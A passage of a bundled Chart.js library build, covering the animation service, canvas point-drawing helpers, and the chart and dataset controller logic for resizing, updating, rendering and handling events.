onAnimationProgress: null, // user specified callback to fire on each step of the animation
onAnimationComplete: null // user specified callback to fire when the animation finishes
});
Chart.animationService = {
frameDuration: 17,
animations: [],
dropFrames: 0,
request: null,
/**
* @function Chart.animationService.addAnimation
* @param chartInstance {ChartController} the chart to animate
* @param animationObject {IAnimation} the animation that we will animate
* @param duration {Number} length of animation in ms
* @param lazy {Boolean} if true, the chart is not marked as animating to enable more responsive interactions
*/
addAnimation: function (chartInstance, animationObject, duration, lazy) {
var me = this;
if (!lazy) {
chartInstance.animating = true;
}
for (var index = 0; index < me.animations.length; ++index) {
if (me.animations[index].chartInstance === chartInstance) {
// replacing an in progress animation
me.animations[index].animationObject = animationObject;
return;
}
}
me.animations.push({
chartInstance: chartInstance,
animationObject: animationObject
});
// If there are no animations queued, manually kickstart a digest, for lack of a better word
if (me.animations.length === 1) {
me.requestAnimationFrame();
}
},
// Cancel the animation for a given chart instance
cancelAnimation: function (chartInstance) {
var index = helpers.findIndex(this.animations, function (animationWrapper) {
return animationWrapper.chartInstance === chartInstance;
});
if (index !== -1) {
this.animations.splice(index, 1);
chartInstance.animating = false;
}
},
requestAnimationFrame: function () {
var me = this;
if (me.request === null) {
// Skip animation frame requests until the active one is executed.
// This can happen when processing mouse events, e.g. 'mousemove'
// and 'mouseout' events will trigger multiple renders.
me.request = helpers.requestAnimFrame.call(window, function () {
me.request = null;
me.startDigest();
});
}
},
startDigest: function () {
var me = this;
var startTime = Date.now();
var framesToDrop = 0;
if (me.dropFrames > 1) {
framesToDrop = Math.floor(me.dropFrames);
me.dropFrames = me.dropFrames % 1;
}
var i = 0;
while (i < me.animations.length) {
if (me.animations[i].animationObject.currentStep === null) {
me.animations[i].animationObject.currentStep = 0;
}
me.animations[i].animationObject.currentStep += 1 + framesToDrop;
if (me.animations[i].animationObject.currentStep > me.animations[i].animationObject.numSteps) {
me.animations[i].animationObject.currentStep = me.animations[i].animationObject.numSteps;
}
me.animations[i].animationObject.render(me.animations[i].chartInstance, me.animations[i].animationObject);
if (me.animations[i].animationObject.onAnimationProgress && me.animations[i].animationObject.onAnimationProgress.call) {
me.animations[i].animationObject.onAnimationProgress.call(me.animations[i].chartInstance, me.animations[i]);
}
if (me.animations[i].animationObject.currentStep === me.animations[i].animationObject.numSteps) {
if (me.animations[i].animationObject.onAnimationComplete && me.animations[i].animationObject.onAnimationComplete.call) {
me.animations[i].animationObject.onAnimationComplete.call(me.animations[i].chartInstance, me.animations[i]);
}
// executed the last frame. Remove the animation.
me.animations[i].chartInstance.animating = false;
me.animations.splice(i, 1);
} else {
++i;
}
}
var endTime = Date.now();
var dropFrames = (endTime - startTime) / me.frameDuration;
me.dropFrames += dropFrames;
// Do we have more stuff to animate?
if (me.animations.length > 0) {
me.requestAnimationFrame();
}
}
};
};
}, {}], 22: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
// Global Chart canvas helpers object for drawing items to canvas
var helpers = Chart.canvasHelpers = {};
helpers.drawPoint = function (ctx, pointStyle, radius, x, y) {
var type, edgeLength, xOffset, yOffset, height, size;
if (typeof pointStyle === 'object') {
type = pointStyle.toString();
if (type === '[object HTMLImageElement]' || type === '[object HTMLCanvasElement]') {
ctx.drawImage(pointStyle, x - pointStyle.width / 2, y - pointStyle.height / 2);
return;
}
}
if (isNaN(radius) || radius <= 0) {
return;
}
switch (pointStyle) {
// Default includes circle
default:
ctx.beginPath();
ctx.arc(x, y, radius, 0, Math.PI * 2);
ctx.closePath();
ctx.fill();
break;
case 'triangle':
ctx.beginPath();
edgeLength = 3 * radius / Math.sqrt(3);
height = edgeLength * Math.sqrt(3) / 2;
ctx.moveTo(x - edgeLength / 2, y + height / 3);
ctx.lineTo(x + edgeLength / 2, y + height / 3);
ctx.lineTo(x, y - 2 * height / 3);
ctx.closePath();
ctx.fill();
break;
case 'rect':
size = 1 / Math.SQRT2 * radius;
ctx.beginPath();
ctx.fillRect(x - size, y - size, 2 * size, 2 * size);
ctx.strokeRect(x - size, y - size, 2 * size, 2 * size);
break;
case 'rectRot':
size = 1 / Math.SQRT2 * radius;
ctx.beginPath();
ctx.moveTo(x - size, y);
ctx.lineTo(x, y + size);
ctx.lineTo(x + size, y);
ctx.lineTo(x, y - size);
ctx.closePath();
ctx.fill();
break;
case 'cross':
ctx.beginPath();
ctx.moveTo(x, y + radius);
ctx.lineTo(x, y - radius);
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
case 'crossRot':
ctx.beginPath();
xOffset = Math.cos(Math.PI / 4) * radius;
yOffset = Math.sin(Math.PI / 4) * radius;
ctx.moveTo(x - xOffset, y - yOffset);
ctx.lineTo(x + xOffset, y + yOffset);
ctx.moveTo(x - xOffset, y + yOffset);
ctx.lineTo(x + xOffset, y - yOffset);
ctx.closePath();
break;
case 'star':
ctx.beginPath();
ctx.moveTo(x, y + radius);
ctx.lineTo(x, y - radius);
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
xOffset = Math.cos(Math.PI / 4) * radius;
yOffset = Math.sin(Math.PI / 4) * radius;
ctx.moveTo(x - xOffset, y - yOffset);
ctx.lineTo(x + xOffset, y + yOffset);
ctx.moveTo(x - xOffset, y + yOffset);
ctx.lineTo(x + xOffset, y - yOffset);
ctx.closePath();
break;
case 'line':
ctx.beginPath();
ctx.moveTo(x - radius, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
case 'dash':
ctx.beginPath();
ctx.moveTo(x, y);
ctx.lineTo(x + radius, y);
ctx.closePath();
break;
}
ctx.stroke();
};
};
}, {}], 23: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// Create a dictionary of chart types, to allow for extension of existing types
Chart.types = {};
// Store a reference to each instance - allowing us to globally resize chart instances on window resize.
// Destroy method on the chart will remove the instance of the chart from this reference.
Chart.instances = {};
// Controllers available for dataset visualization eg. bar, line, slice, etc.
Chart.controllers = {};
/**
* The "used" size is the final value of a dimension property after all calculations have
* been performed. This method uses the computed style of `element` but returns undefined
* if the computed style is not expressed in pixels. That can happen in some cases where
* `element` has a size relative to its parent and this last one is not yet displayed,
* for example because of `display: none` on a parent node.
* TODO(SB) Move this method in the upcoming core.platform class.
* @see https://developer.mozilla.org/en-US/docs/Web/CSS/used_value
* @returns {Number} Size in pixels or undefined if unknown.
*/
function readUsedSize(element, property) {
var value = helpers.getStyle(element, property);
var matches = value && value.match(/(\d+)px/);
return matches ? Number(matches[1]) : undefined;
}
/**
* Initializes the canvas style and render size without modifying the canvas display size,
* since responsiveness is handled by the controller.resize() method. The config is used
* to determine the aspect ratio to apply in case no explicit height has been specified.
* TODO(SB) Move this method in the upcoming core.platform class.
*/
function initCanvas(canvas, config) {
var style = canvas.style;
// NOTE(SB) canvas.getAttribute('width') !== canvas.width: in the first case it
// returns null or '' if no explicit value has been set to the canvas attribute.
var renderHeight = canvas.getAttribute('height');
var renderWidth = canvas.getAttribute('width');
// Chart.js modifies some canvas values that we want to restore on destroy
canvas._chartjs = {
initial: {
height: renderHeight,
width: renderWidth,
style: {
display: style.display,
height: style.height,
width: style.width
}
}
};
// Force canvas to display as block to avoid extra space caused by inline
// elements, which would interfere with the responsive resize process.
// https://github.com/chartjs/Chart.js/issues/2538
style.display = style.display || 'block';
if (renderWidth === null || renderWidth === '') {
var displayWidth = readUsedSize(canvas, 'width');
if (displayWidth !== undefined) {
canvas.width = displayWidth;
}
}
if (renderHeight === null || renderHeight === '') {
if (canvas.style.height === '') {
// If no explicit render height and style height, let's apply the aspect ratio,
// which one can be specified by the user but also by charts as default option
// (i.e. options.aspectRatio). If not specified, use canvas aspect ratio of 2.
canvas.height = canvas.width / (config.options.aspectRatio || 2);
} else {
var displayHeight = readUsedSize(canvas, 'height');
if (displayWidth !== undefined) {
canvas.height = displayHeight;
}
}
}
return canvas;
}
/**
* Restores the canvas initial state, such as render/display sizes and style.
* TODO(SB) Move this method in the upcoming core.platform class.
*/
function releaseCanvas(canvas) {
if (!canvas._chartjs) {
return;
}
var initial = canvas._chartjs.initial;
['height', 'width'].forEach(function (prop) {
var value = initial[prop];
if (value === undefined || value === null) {
canvas.removeAttribute(prop);
} else {
canvas.setAttribute(prop, value);
}
});
helpers.each(initial.style || {}, function (value, key) {
canvas.style[key] = value;
});
// The canvas render size might have been changed (and thus the state stack discarded),
// we can't use save() and restore() to restore the initial state. So make sure that at
// least the canvas context is reset to the default state by setting the canvas width.
// https://www.w3.org/TR/2011/WD-html5-20110525/the-canvas-element.html
canvas.width = canvas.width;
delete canvas._chartjs;
}
/**
* TODO(SB) Move this method in the upcoming core.platform class.
*/
function acquireContext(item, config) {
if (typeof item === 'string') {
item = document.getElementById(item);
} else if (item.length) {
// Support for array based queries (such as jQuery)
item = item[0];
}
if (item && item.canvas) {
// Support for any object associated to a canvas (including a context2d)
item = item.canvas;
}
if (item instanceof HTMLCanvasElement) {
// To prevent canvas fingerprinting, some add-ons undefine the getContext
// method, for example: https://github.com/kkapsner/CanvasBlocker
// https://github.com/chartjs/Chart.js/issues/2807
var context = item.getContext && item.getContext('2d');
if (context instanceof CanvasRenderingContext2D) {
initCanvas(item, config);
return context;
}
}
return null;
}
/**
* Initializes the given config with global and chart default values.
*/
function initConfig(config) {
config = config || {};
// Do NOT use configMerge() for the data object because this method merges arrays
// and so would change references to labels and datasets, preventing data updates.
var data = config.data = config.data || {};
data.datasets = data.datasets || [];
data.labels = data.labels || [];
config.options = helpers.configMerge(
Chart.defaults.global,
Chart.defaults[config.type],
config.options || {});
return config;
}
/**
* @class Chart.Controller
* The main controller of a chart.
*/
Chart.Controller = function (item, config, instance) {
var me = this;
config = initConfig(config);
var context = acquireContext(item, config);
var canvas = context && context.canvas;
var height = canvas && canvas.height;
var width = canvas && canvas.width;
instance.ctx = context;
instance.canvas = canvas;
instance.config = config;
instance.width = width;
instance.height = height;
instance.aspectRatio = height ? width / height : null;
me.id = helpers.uid();
me.chart = instance;
me.config = config;
me.options = config.options;
me._bufferedRender = false;
// Add the chart instance to the global namespace
Chart.instances[me.id] = me;
Object.defineProperty(me, 'data', {
get: function () {
return me.config.data;
}
});
if (!context || !canvas) {
// The given item is not a compatible context2d element, let's return before finalizing
// the chart initialization but after setting basic chart / controller properties that
// can help to figure out that the chart is not valid (e.g chart.canvas !== null);
// https://github.com/chartjs/Chart.js/issues/2807
console.error("Failed to create chart: can't acquire context from the given item");
return me;
}
helpers.retinaScale(instance);
// Responsiveness is currently based on the use of an iframe, however this method causes
// performance issues and could be troublesome when used with ad blockers. So make sure
// that the user is still able to create a chart without iframe when responsive is false.
// See https://github.com/chartjs/Chart.js/issues/2210
if (me.options.responsive) {
helpers.addResizeListener(canvas.parentNode, function () {
me.resize();
});
// Initial resize before chart draws (must be silent to preserve initial animations).
me.resize(true);
}
me.initialize();
return me;
};
helpers.extend(Chart.Controller.prototype, /** @lends Chart.Controller */ {
initialize: function () {
var me = this;
// Before init plugin notification
Chart.plugins.notify('beforeInit', [me]);
me.bindEvents();
// Make sure controllers are built first so that each dataset is bound to an axis before the scales
// are built
me.ensureScalesHaveIDs();
me.buildOrUpdateControllers();
me.buildScales();
me.updateLayout();
me.resetElements();
me.initToolTip();
me.update();
// After init plugin notification
Chart.plugins.notify('afterInit', [me]);
return me;
},
clear: function () {
helpers.clear(this.chart);
return this;
},
stop: function () {
// Stops any current animation loop occurring
Chart.animationService.cancelAnimation(this);
return this;
},
resize: function (silent) {
var me = this;
var chart = me.chart;
var options = me.options;
var canvas = chart.canvas;
var aspectRatio = (options.maintainAspectRatio && chart.aspectRatio) || null;
// the canvas render width and height will be casted to integers so make sure that
// the canvas display style uses the same integer values to avoid blurring effect.
var newWidth = Math.floor(helpers.getMaximumWidth(canvas));
var newHeight = Math.floor(aspectRatio ? newWidth / aspectRatio : helpers.getMaximumHeight(canvas));
if (chart.width === newWidth && chart.height === newHeight) {
return;
}
canvas.width = chart.width = newWidth;
canvas.height = chart.height = newHeight;
canvas.style.width = newWidth + 'px';
canvas.style.height = newHeight + 'px';
helpers.retinaScale(chart);
// Notify any plugins about the resize
var newSize = {width: newWidth, height: newHeight};
Chart.plugins.notify('resize', [me, newSize]);
// Notify of resize
if (me.options.onResize) {
me.options.onResize(me, newSize);
}
if (!silent) {
me.stop();
me.update(me.options.responsiveAnimationDuration);
}
},
ensureScalesHaveIDs: function () {
var options = this.options;
var scalesOptions = options.scales || {};
var scaleOptions = options.scale;
helpers.each(scalesOptions.xAxes, function (xAxisOptions, index) {
xAxisOptions.id = xAxisOptions.id || ('x-axis-' + index);
});
helpers.each(scalesOptions.yAxes, function (yAxisOptions, index) {
yAxisOptions.id = yAxisOptions.id || ('y-axis-' + index);
});
if (scaleOptions) {
scaleOptions.id = scaleOptions.id || 'scale';
}
},
/**
* Builds a map of scale ID to scale object for future lookup.
*/
buildScales: function () {
var me = this;
var options = me.options;
var scales = me.scales = {};
var items = [];
if (options.scales) {
items = items.concat(
(options.scales.xAxes || []).map(function (xAxisOptions) {
return {options: xAxisOptions, dtype: 'category'};
}),
(options.scales.yAxes || []).map(function (yAxisOptions) {
return {options: yAxisOptions, dtype: 'linear'};
})
);
}
if (options.scale) {
items.push({options: options.scale, dtype: 'radialLinear', isDefault: true});
}
helpers.each(items, function (item) {
var scaleOptions = item.options;
var scaleType = helpers.getValueOrDefault(scaleOptions.type, item.dtype);
var scaleClass = Chart.scaleService.getScaleConstructor(scaleType);
if (!scaleClass) {
return;
}
var scale = new scaleClass({
id: scaleOptions.id,
options: scaleOptions,
ctx: me.chart.ctx,
chart: me
});
scales[scale.id] = scale;
// TODO(SB): I think we should be able to remove this custom case (options.scale)
// and consider it as a regular scale part of the "scales"" map only! This would
// make the logic easier and remove some useless? custom code.
if (item.isDefault) {
me.scale = scale;
}
});
Chart.scaleService.addScalesToLayout(this);
},
updateLayout: function () {
Chart.layoutService.update(this, this.chart.width, this.chart.height);
},
buildOrUpdateControllers: function () {
var me = this;
var types = [];
var newControllers = [];
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
var meta = me.getDatasetMeta(datasetIndex);
if (!meta.type) {
meta.type = dataset.type || me.config.type;
}
types.push(meta.type);
if (meta.controller) {
meta.controller.updateIndex(datasetIndex);
} else {
meta.controller = new Chart.controllers[meta.type](me, datasetIndex);
newControllers.push(meta.controller);
}
}, me);
if (types.length > 1) {
for (var i = 1; i < types.length; i++) {
if (types[i] !== types[i - 1]) {
me.isCombo = true;
break;
}
}
}
return newControllers;
},
/**
* Reset the elements of all datasets
* @method resetElements
* @private
*/
resetElements: function () {
var me = this;
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
me.getDatasetMeta(datasetIndex).controller.reset();
}, me);
},
/**
* Resets the chart back to it's state before the initial animation
* @method reset
*/
reset: function () {
this.resetElements();
this.tooltip.initialize();
},
update: function (animationDuration, lazy) {
var me = this;
Chart.plugins.notify('beforeUpdate', [me]);
// In case the entire data object changed
me.tooltip._data = me.data;
// Make sure dataset controllers are updated and new controllers are reset
var newControllers = me.buildOrUpdateControllers();
// Make sure all dataset controllers have correct meta data counts
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
me.getDatasetMeta(datasetIndex).controller.buildOrUpdateElements();
}, me);
Chart.layoutService.update(me, me.chart.width, me.chart.height);
// Apply changes to the datasets that require the scales to have been calculated i.e BorderColor changes
Chart.plugins.notify('afterScaleUpdate', [me]);
// Can only reset the new controllers after the scales have been updated
helpers.each(newControllers, function (controller) {
controller.reset();
});
me.updateDatasets();
// Do this before render so that any plugins that need final scale updates can use it
Chart.plugins.notify('afterUpdate', [me]);
if (me._bufferedRender) {
me._bufferedRequest = {
lazy: lazy,
duration: animationDuration
};
} else {
me.render(animationDuration, lazy);
}
},
/**
* @method beforeDatasetsUpdate
* @description Called before all datasets are updated. If a plugin returns false,
* the datasets update will be cancelled until another chart update is triggered.
* @param {Object} instance the chart instance being updated.
* @returns {Boolean} false to cancel the datasets update.
* @memberof Chart.PluginBase
* @since version 2.1.5
* @instance
*/
/**
* @method afterDatasetsUpdate
* @description Called after all datasets have been updated. Note that this
* extension will not be called if the datasets update has been cancelled.
* @param {Object} instance the chart instance being updated.
* @memberof Chart.PluginBase
* @since version 2.1.5
* @instance
*/
/**
* Updates all datasets unless a plugin returns false to the beforeDatasetsUpdate
* extension, in which case no datasets will be updated and the afterDatasetsUpdate
* notification will be skipped.
* @protected
* @instance
*/
updateDatasets: function () {
var me = this;
var i, ilen;
if (Chart.plugins.notify('beforeDatasetsUpdate', [me])) {
for (i = 0, ilen = me.data.datasets.length; i < ilen; ++i) {
me.getDatasetMeta(i).controller.update();
}
Chart.plugins.notify('afterDatasetsUpdate', [me]);
}
},
render: function (duration, lazy) {
var me = this;
Chart.plugins.notify('beforeRender', [me]);
var animationOptions = me.options.animation;
if (animationOptions && ((typeof duration !== 'undefined' && duration !== 0) || (typeof duration === 'undefined' && animationOptions.duration !== 0))) {
var animation = new Chart.Animation();
animation.numSteps = (duration || animationOptions.duration) / 16.66; // 60 fps
animation.easing = animationOptions.easing;
// render function
animation.render = function (chartInstance, animationObject) {
var easingFunction = helpers.easingEffects[animationObject.easing];
var stepDecimal = animationObject.currentStep / animationObject.numSteps;
var easeDecimal = easingFunction(stepDecimal);
chartInstance.draw(easeDecimal, stepDecimal, animationObject.currentStep);
};
// user events
animation.onAnimationProgress = animationOptions.onProgress;
animation.onAnimationComplete = animationOptions.onComplete;
Chart.animationService.addAnimation(me, animation, duration, lazy);
} else {
me.draw();
if (animationOptions && animationOptions.onComplete && animationOptions.onComplete.call) {
animationOptions.onComplete.call(me);
}
}
return me;
},
draw: function (ease) {
var me = this;
var easingDecimal = ease || 1;
me.clear();
Chart.plugins.notify('beforeDraw', [me, easingDecimal]);
// Draw all the scales
helpers.each(me.boxes, function (box) {
box.draw(me.chartArea);
}, me);
if (me.scale) {
me.scale.draw();
}
Chart.plugins.notify('beforeDatasetsDraw', [me, easingDecimal]);
// Draw each dataset via its respective controller (reversed to support proper line stacking)
helpers.each(me.data.datasets, function (dataset, datasetIndex) {
if (me.isDatasetVisible(datasetIndex)) {
me.getDatasetMeta(datasetIndex).controller.draw(ease);
}
}, me, true);
Chart.plugins.notify('afterDatasetsDraw', [me, easingDecimal]);
// Finally draw the tooltip
me.tooltip.transition(easingDecimal).draw();
Chart.plugins.notify('afterDraw', [me, easingDecimal]);
},
// Get the single element that was clicked on
// @return : An object containing the dataset index and element index of the matching element. Also contains the rectangle that was draw
getElementAtEvent: function (e) {
return Chart.Interaction.modes.single(this, e);
},
getElementsAtEvent: function (e) {
return Chart.Interaction.modes.label(this, e, {intersect: true});
},
getElementsAtXAxis: function (e) {
return Chart.Interaction.modes['x-axis'](this, e, {intersect: true});
},
getElementsAtEventForMode: function (e, mode, options) {
var method = Chart.Interaction.modes[mode];
if (typeof method === 'function') {
return method(this, e, options);
}
return [];
},
getDatasetAtEvent: function (e) {
return Chart.Interaction.modes.dataset(this, e);
},
getDatasetMeta: function (datasetIndex) {
var me = this;
var dataset = me.data.datasets[datasetIndex];
if (!dataset._meta) {
dataset._meta = {};
}
var meta = dataset._meta[me.id];
if (!meta) {
meta = dataset._meta[me.id] = {
type: null,
data: [],
dataset: null,
controller: null,
hidden: null, // See isDatasetVisible() comment
xAxisID: null,
yAxisID: null
};
}
return meta;
},
getVisibleDatasetCount: function () {
var count = 0;
for (var i = 0, ilen = this.data.datasets.length; i < ilen; ++i) {
if (this.isDatasetVisible(i)) {
count++;
}
}
return count;
},
isDatasetVisible: function (datasetIndex) {
var meta = this.getDatasetMeta(datasetIndex);
// meta.hidden is a per chart dataset hidden flag override with 3 states: if true or false,
// the dataset.hidden value is ignored, else if null, the dataset hidden state is returned.
return typeof meta.hidden === 'boolean' ? !meta.hidden : !this.data.datasets[datasetIndex].hidden;
},
generateLegend: function () {
return this.options.legendCallback(this);
},
destroy: function () {
var me = this;
var canvas = me.chart.canvas;
var meta, i, ilen;
me.stop();
// dataset controllers need to cleanup associated data
for (i = 0, ilen = me.data.datasets.length; i < ilen; ++i) {
meta = me.getDatasetMeta(i);
if (meta.controller) {
meta.controller.destroy();
meta.controller = null;
}
}
if (canvas) {
helpers.unbindEvents(me, me.events);
helpers.removeResizeListener(canvas.parentNode);
helpers.clear(me.chart);
releaseCanvas(canvas);
me.chart.canvas = null;
me.chart.ctx = null;
}
Chart.plugins.notify('destroy', [me]);
delete Chart.instances[me.id];
},
toBase64Image: function () {
return this.chart.canvas.toDataURL.apply(this.chart.canvas, arguments);
},
initToolTip: function () {
var me = this;
me.tooltip = new Chart.Tooltip({
_chart: me.chart,
_chartInstance: me,
_data: me.data,
_options: me.options.tooltips
}, me);
me.tooltip.initialize();
},
bindEvents: function () {
var me = this;
helpers.bindEvents(me, me.options.events, function (evt) {
me.eventHandler(evt);
});
},
updateHoverStyle: function (elements, mode, enabled) {
var method = enabled ? 'setHoverStyle' : 'removeHoverStyle';
var element, i, ilen;
for (i = 0, ilen = elements.length; i < ilen; ++i) {
element = elements[i];
if (element) {
this.getDatasetMeta(element._datasetIndex).controller[method](element);
}
}
},
eventHandler: function (e) {
var me = this;
var legend = me.legend;
var tooltip = me.tooltip;
var hoverOptions = me.options.hover;
// Buffer any update calls so that renders do not occur
me._bufferedRender = true;
me._bufferedRequest = null;
var changed = me.handleEvent(e);
changed |= legend && legend.handleEvent(e);
changed |= tooltip && tooltip.handleEvent(e);
var bufferedRequest = me._bufferedRequest;
if (bufferedRequest) {
// If we have an update that was triggered, we need to do a normal render
me.render(bufferedRequest.duration, bufferedRequest.lazy);
} else if (changed && !me.animating) {
// If entering, leaving, or changing elements, animate the change via pivot
me.stop();
// We only need to render at this point. Updating will cause scales to be
// recomputed generating flicker & using more memory than necessary.
me.render(hoverOptions.animationDuration, true);
}
me._bufferedRender = false;
me._bufferedRequest = null;
return me;
},
/**
* Handle an event
* @private
* param e {Event} the event to handle
* @return {Boolean} true if the chart needs to re-render
*/
handleEvent: function (e) {
var me = this;
var options = me.options || {};
var hoverOptions = options.hover;
var changed = false;
me.lastActive = me.lastActive || [];
// Find Active Elements for hover and tooltips
if (e.type === 'mouseout') {
me.active = [];
} else {
me.active = me.getElementsAtEventForMode(e, hoverOptions.mode, hoverOptions);
}
// On Hover hook
if (hoverOptions.onHover) {
hoverOptions.onHover.call(me, me.active);
}
if (e.type === 'mouseup' || e.type === 'click') {
if (options.onClick) {
options.onClick.call(me, e, me.active);
}
}
// Remove styling for last active (even if it may still be active)
if (me.lastActive.length) {
me.updateHoverStyle(me.lastActive, hoverOptions.mode, false);
}
// Built in hover styling
if (me.active.length && hoverOptions.mode) {
me.updateHoverStyle(me.active, hoverOptions.mode, true);
}
changed = !helpers.arrayEquals(me.active, me.lastActive);
// Remember Last Actives
me.lastActive = me.active;
return changed;
}
});
};
}, {}], 24: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var arrayEvents = ['push', 'pop', 'shift', 'splice', 'unshift'];
/**
* Hooks the array methods that add or remove values ('push', pop', 'shift', 'splice',
* 'unshift') and notify the listener AFTER the array has been altered. Listeners are
* called on the 'onData*' callbacks (e.g. onDataPush, etc.) with same arguments.
*/
function listenArrayEvents(array, listener) {
if (array._chartjs) {
array._chartjs.listeners.push(listener);
return;
}
Object.defineProperty(array, '_chartjs', {
configurable: true,
enumerable: false,
value: {
listeners: [listener]
}
});
arrayEvents.forEach(function (key) {
var method = 'onData' + key.charAt(0).toUpperCase() + key.slice(1);
var base = array[key];
Object.defineProperty(array, key, {
configurable: true,
enumerable: false,
value: function () {
var args = Array.prototype.slice.call(arguments);
var res = base.apply(this, args);
helpers.each(array._chartjs.listeners, function (object) {
if (typeof object[method] === 'function') {
object[method].apply(object, args);
}
});
return res;
}
});
});
}
/**
* Removes the given array event listener and cleanup extra attached properties (such as
* the _chartjs stub and overridden methods) if array doesn't have any more listeners.
*/
function unlistenArrayEvents(array, listener) {
var stub = array._chartjs;
if (!stub) {
return;
}
var listeners = stub.listeners;
var index = listeners.indexOf(listener);
if (index !== -1) {
listeners.splice(index, 1);
}
if (listeners.length > 0) {
return;
}
arrayEvents.forEach(function (key) {
delete array[key];
});
delete array._chartjs;
}
// Base class for all dataset controllers (line, bar, etc)
Chart.DatasetController = function (chart, datasetIndex) {
this.initialize(chart, datasetIndex);
};
helpers.extend(Chart.DatasetController.prototype, {
/**
* Element type used to generate a meta dataset (e.g. Chart.element.Line).
* @type {Chart.core.element}
*/
datasetElementType: null,
/**
* Element type used to generate a meta data (e.g. Chart.element.Point).
* @type {Chart.core.element}
*/
dataElementType: null,
initialize: function (chart, datasetIndex) {
var me = this;
me.chart = chart;
me.index = datasetIndex;
me.linkScales();
me.addElements();
},
updateIndex: function (datasetIndex) {
this.index = datasetIndex;
},
linkScales: function () {
var me = this;
var meta = me.getMeta();
var dataset = me.getDataset();
if (meta.xAxisID === null) {
meta.xAxisID = dataset.xAxisID || me.chart.options.scales.xAxes[0].id;
}
if (meta.yAxisID === null) {
meta.yAxisID = dataset.yAxisID || me.chart.options.scales.yAxes[0].id;
}
},
getDataset: function () {
return this.chart.data.datasets[this.index];
},
getMeta: function () {
return this.chart.getDatasetMeta(this.index);
},
getScaleForId: function (scaleID) {
return this.chart.scales[scaleID];
},
reset: function () {
this.update(true);
},
/**
* @private
*/
destroy: function () {
if (this._data) {
unlistenArrayEvents(this._data, this);
}
},
createMetaDataset: function () {
var me = this;
var type = me.datasetElementType;
return type && new type({
_chart: me.chart.chart,
_datasetIndex: me.index
});
},
createMetaData: function (index) {
var me = this;
var type = me.dataElementType;
return type && new type({
_chart: me.chart.chart,
_datasetIndex: me.index,
_index: index
});
},
addElements: function () {
var me = this;
var meta = me.getMeta();
var data = me.getDataset().data || [];
var metaData = meta.data;
var i, ilen;
for (i = 0, ilen = data.length; i < ilen; ++i) {
metaData[i] = metaData[i] || me.createMetaData(i);
}
meta.dataset = meta.dataset || me.createMetaDataset();
},
addElementAndReset: function (index) {
var element = this.createMetaData(index);
this.getMeta().data.splice(index, 0, element);
this.updateElement(element, index, true);
},
buildOrUpdateElements: function () {
var me = this;
var dataset = me.getDataset();
var data = dataset.data || (dataset.data = []);
// In order to correctly handle data addition/deletion animation (an thus simulate
// real-time charts), we need to monitor these data modifications and synchronize
// the internal meta data accordingly.
if (me._data !== data) {
if (me._data) {
// This case happens when the user replaced the data array instance.
unlistenArrayEvents(me._data, me);
}
listenArrayEvents(data, me);
me._data = data;
}
// Re-sync meta data in case the user replaced the data array or if we missed
// any updates and so make sure that we handle number of datapoints changing.
me.resyncElements();
},
update: helpers.noop,
draw: function (ease) {
var easingDecimal = ease || 1;
var i, len;
var metaData = this.getMeta().data;
for (i = 0, len = metaData.length; i < len; ++i) {
metaData[i].transition(easingDecimal).draw();
}
},
removeHoverStyle: function (element, elementOpts) {
var dataset = this.chart.data.datasets[element._datasetIndex],
index = element._index,
custom = element.custom || {},
valueOrDefault = helpers.getValueAtIndexOrDefault,
model = element._model;
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : valueOrDefault(dataset.backgroundColor, index, elementOpts.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : valueOrDefault(dataset.borderColor, index, elementOpts.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : valueOrDefault(dataset.borderWidth, index, elementOpts.borderWidth);
},
setHoverStyle: function (element) {
var dataset = this.chart.data.datasets[element._datasetIndex],
index = element._index,
custom = element.custom || {},
valueOrDefault = helpers.getValueAtIndexOrDefault,
getHoverColor = helpers.getHoverColor,
model = element._model;
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : valueOrDefault(dataset.hoverBackgroundColor, index, getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : valueOrDefault(dataset.hoverBorderColor, index, getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : valueOrDefault(dataset.hoverBorderWidth, index, model.borderWidth);
},
/**
* @private
*/
resyncElements: function () {
var me = this;
var meta = me.getMeta();
var data = me.getDataset().data;
var numMeta = meta.data.length;
var numData = data.length;
if (numData < numMeta) {
meta.data.splice(numData, numMeta - numData);
} else if (numData > numMeta) {
me.insertElements(numMeta, numData - numMeta);
}
},
/**
* @private
*/
insertElements: function (start, count) {
for (var i = 0; i < count; ++i) {
this.addElementAndReset(start + i);
}
},
/**
* @private
*/
onDataPush: function () {
this.insertElements(this.getDataset().data.length - 1, arguments.length);
},
/**
* @private
*/
onDataPop: function () {
this.getMeta().data.pop();
},
/**
* @private
*/
onDataShift: function () {
this.getMeta().data.shift();
},
/**
* @private
*/
onDataSplice: function (start, count) {
this.getMeta().data.splice(start, count);
this.insertElements(start, arguments.length - 2);
},
/**
* @private
*/
onDataUnshift: function () {
this.insertElements(0, arguments.length);
}
});
Chart.DatasetController.extend = helpers.inherits;
};
}, {}], 25: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.elements = {};
Chart.Element = function (configuration) {
helpers.extend(this, configuration);
this.initialize.apply(this, arguments);
};
helpers.extend(Chart.Element.prototype, {
initialize: function () {
this.hidden = false;
},
pivot: function () {
var me = this;
if (!me._view) {
me._view = helpers.clone(me._model);
}
me._start = helpers.clone(me._view);
return me;
},
transition: function (ease) {
var me = this;
if (!me._view) {
me._view = helpers.clone(me._model);
}
// No animation -> No Transition
if (ease === 1) {
me._view = me._model;
me._start = null;
return me;
}
if (!me._start) {
me.pivot();
}
helpers.each(me._model, function (value, key) {
if (key[0] === '_') {
// Only non-underscored properties
// Init if doesn't exist
} else if (!me._view.hasOwnProperty(key)) {
